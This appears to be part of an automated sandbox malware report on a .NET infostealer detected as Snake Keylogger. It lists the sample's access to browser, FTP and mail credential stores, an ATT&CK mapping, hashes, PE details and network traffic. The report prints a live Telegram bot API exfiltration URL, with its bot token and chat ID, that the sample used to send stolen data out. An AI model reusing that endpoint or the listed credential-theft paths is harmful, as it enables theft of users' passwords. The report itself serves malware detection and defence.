                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C65587 LdrInitializeThunk,
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0OZQi3b0tM.exe, u003b?u058f??/?u0040???.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 0OZQi3b0tM.exe, ufffd?jkufffd/?????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, u003b?u058f??/?u0040???.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, ufffd?jkufffd/?????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, u003b?u058f??/?u0040???.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, ufffd?jkufffd/?????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Users\user\Desktop\0OZQi3b0tM.exe VolumeInformation
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 0OZQi3b0tM.exe PID: 7100, type: MEMORYSTR
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 0OZQi3b0tM.exe PID: 7100, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 0OZQi3b0tM.exe PID: 7100, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Command and Scripting Interpreter
                Path InterceptionPath Interception1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                Process Discovery
                Remote Services1
                Email Collection
                Exfiltration Over Other Network Medium1
                Web Service
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Native API
                Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                Remote System Discovery
                Remote Desktop Protocol11
                Archive Collected Data
                Exfiltration Over Bluetooth11
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information
                Security Account Manager1
                System Network Configuration Discovery
                SMB/Windows Admin Shares2
                Data from Local System
                Automated Exfiltration1
                Ingress Tool Transfer
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS13
                System Information Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer3
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits14
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                0OZQi3b0tM.exe73%VirustotalBrowse
                0OZQi3b0tM.exe49%MetadefenderBrowse
                0OZQi3b0tM.exe88%ReversingLabsByteCode-MSIL.Infostealer.Mintluks
                0OZQi3b0tM.exe100%AviraTR/ATRAPS.Gen
                0OZQi3b0tM.exe100%Joe Sandbox ML
                No Antivirus matches
                SourceDetectionScannerLabelLinkDownload
                0.2.0OZQi3b0tM.exe.530000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                0.0.0OZQi3b0tM.exe.530000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                SourceDetectionScannerLabelLink
                checkip.dyndns.com0%VirustotalBrowse
                checkip.dyndns.org0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://api.telegram0%URL Reputationsafe
                https://api.telegram.org40%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                https://api.telegram.orgD80%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  193.122.130.0
                  truetrueunknown
                  checkip.dyndns.org
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://checkip.dyndns.org/true
                  • URL Reputation: safe
                  unknown
                  https://api.telegram.org/bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snakefalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.telegram0OZQi3b0tM.exe, 00000000.00000003.670353008.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org40OZQi3b0tM.exe, 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org/bot0OZQi3b0tM.exefalse
                      high
                      http://api.telegram.org0OZQi3b0tM.exe, 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0OZQi3b0tM.exe, 00000000.00000002.737020624.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://api.telegram.orgD80OZQi3b0tM.exe, 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://checkip.dyndns.org/q0OZQi3b0tM.exefalse
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=18560OZQi3b0tM.exe, 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            149.154.167.220
                            api.telegram.orgUnited Kingdom
                            62041TELEGRAMRUfalse
                            193.122.130.0
                            checkip.dyndns.comUnited States
                            31898ORACLE-BMC-31898UStrue
                            Joe Sandbox Version:35.0.0 Citrine
                            Analysis ID:652382
                            Start date and time: 26/06/202209:31:062022-06-26 09:31:06 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 7s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:0OZQi3b0tM.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@4/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 0.5% (good quality ratio 0.5%)
                            • Quality average: 57.3%
                            • Quality standard deviation: 30.1%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Adjust boot time
                            • Enable AMSI
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                            • TCP Packets have been reduced to 100
                            • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, licensing.mp.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            09:32:26API Interceptor2x Sleep call for process: 0OZQi3b0tM.exe modified
                            No context
                            No context
                            No context
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):5.825310298922626
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                            • Win32 Executable (generic) a (10002005/4) 49.75%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Windows Screen Saver (13104/52) 0.07%
                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                            File name:0OZQi3b0tM.exe
                            File size:129537
                            MD5:a90c091abded4a4f763de7537f569167
                            SHA1:9394b05c2d518ee5d75fb030f2dca6d15c44bf0a
                            SHA256:653b29296dcc50bfb59898d3ba38748b1c484701079ccc85f45bd2c0e4ecbe3e
                            SHA512:c79ec6d2af2b415d706c501ec746db4f535c74699382e1ccb72490b5b9153ed8c0b527bec61cce09ae2fbcc934c7b212ff101c0e447f7051bfc26c4120b7e4c4
                            SSDEEP:3072:gFlAi/smc7Rkw3HTCnnnnnnnnnnnnnnnnnn9b8GOswBn7FbY8:crkIb4hbN
                            TLSH:E5C3061D3BF88904E6FE8A7306B14211CBB5F952095ACD1D1AC1F8592A7D780DE1BFA3
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....hb..............P.................. ... ....@.. .......................`............@................................
                            Icon Hash:00828e8e8686b000
                            Entrypoint:0x42039e
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x626883A2 [Tue Apr 26 23:43:30 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2034c0x4f.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x10a7.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x240000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x1e3a40x1e400False0.353515625data5.839230413440738IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0x220000x10a70x1200False0.3615451388888889data4.880851013817396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x240000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountry
                            RT_VERSION0x220a00x3acdata
                            RT_MANIFEST0x2244c0xc5bXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            DLLImport
                            mscoree.dll_CorExeMain
                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            192.168.2.5193.122.130.049746802842536 06/26/22-09:32:22.672654TCP2842536ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check4974680192.168.2.5193.122.130.0
                            TimestampSource PortDest PortSource IPDest IP
                            Jun 26, 2022 09:32:22.561532974 CEST4974680192.168.2.5193.122.130.0
                            Jun 26, 2022 09:32:22.672110081 CEST8049746193.122.130.0192.168.2.5
                            Jun 26, 2022 09:32:22.672224045 CEST4974680192.168.2.5193.122.130.0
                            Jun 26, 2022 09:32:22.672653913 CEST4974680192.168.2.5193.122.130.0
                            Jun 26, 2022 09:32:22.783502102 CEST8049746193.122.130.0192.168.2.5
                            Jun 26, 2022 09:32:22.784780025 CEST8049746193.122.130.0192.168.2.5
                            Jun 26, 2022 09:32:22.833494902 CEST4974680192.168.2.5193.122.130.0
                            Jun 26, 2022 09:32:24.730010033 CEST49759443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:24.730082035 CEST44349759149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:24.730184078 CEST49759443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:24.781352043 CEST49759443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:24.781409025 CEST44349759149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:24.853692055 CEST44349759149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:24.853822947 CEST49759443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:24.857400894 CEST49759443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:24.857429028 CEST44349759149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:24.857749939 CEST44349759149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:24.911766052 CEST49759443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:25.311224937 CEST49759443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:25.356656075 CEST44349759149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:25.356762886 CEST49759443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:25.356782913 CEST44349759149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:25.676865101 CEST44349759149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:25.676970005 CEST44349759149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:25.677052975 CEST49759443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:25.678920031 CEST49759443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:38.361953020 CEST49769443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:38.361998081 CEST44349769149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:38.362095118 CEST49769443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:38.363138914 CEST49769443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:38.363159895 CEST44349769149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:38.419811964 CEST44349769149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:38.456655025 CEST49769443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:38.456685066 CEST44349769149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:38.457139969 CEST49769443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:38.457151890 CEST44349769149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.066467047 CEST44349769149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.066574097 CEST44349769149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.066696882 CEST49769443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.067785025 CEST49769443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.092293978 CEST49770443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.092344046 CEST44349770149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.092494965 CEST49770443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.093384027 CEST49770443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.093400955 CEST44349770149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.150325060 CEST44349770149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.154371977 CEST49770443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.154416084 CEST44349770149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.154561043 CEST49770443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.154573917 CEST44349770149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.463474989 CEST44349770149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.463581085 CEST44349770149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.463696957 CEST49770443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.465049982 CEST49770443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.467402935 CEST49771443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.467488050 CEST44349771149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.467686892 CEST49771443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.468652964 CEST49771443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.468686104 CEST44349771149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.525685072 CEST44349771149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.529802084 CEST49771443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.529839039 CEST44349771149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.529979944 CEST49771443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.529993057 CEST44349771149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.891726017 CEST44349771149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.891838074 CEST44349771149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.891932011 CEST49771443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.893026114 CEST49771443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.895248890 CEST49772443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.895297050 CEST44349772149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.895446062 CEST49772443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.896065950 CEST49772443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.896085978 CEST44349772149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.955374002 CEST44349772149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.969228983 CEST49772443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.969271898 CEST44349772149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:39.969391108 CEST49772443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:39.969408035 CEST44349772149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:40.266973972 CEST44349772149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:40.267072916 CEST44349772149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:40.267184019 CEST49772443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:40.295578003 CEST49772443192.168.2.5149.154.167.220
